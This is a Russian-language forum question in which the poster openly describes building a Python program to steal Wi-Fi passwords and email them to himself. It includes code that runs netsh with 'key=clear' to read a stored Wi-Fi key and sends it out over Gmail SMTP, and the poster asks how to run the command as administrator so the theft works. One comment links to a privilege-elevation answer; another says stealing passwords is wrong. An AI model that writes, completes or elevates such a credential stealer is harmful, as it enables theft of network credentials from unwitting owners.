# Как через subprocess запустить cmd в винде от инени админа

Tags: python, cmd, windows-7, smtplib

Дарово пасаны) У меня опять проблемы!!! Делаю прогу которая ворует пароль от wifi и отправляет его мне на почту. Прога легкая и написал я ее минут за 10, но потом, когда тестил произошла небольшая ошибочка.

```
import subprocess, smtplib

    def send_mail(email, password, message):
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.starttls()
        server.login(email, password)
        server.sendmail(email, email, message)
        server.quit()

    command = "netsh wlan show profile RT-WIFI_4177 key=clear"
    result = subprocess.check_output(command, shell=True)
    send_mail("email@gmail.com"," emai@gmail.com", message)
```

Проблема в том, что, чтобы видовс терминал выдал мне пароль от wifi   надо запустить консольку от имени админа,  я хз как это сделать)

Comment: https://stackoverflow.com/questions/47380378/run-process-as-admin-with-subprocess-run-in-python

Comment: Воровать пароли не хорошо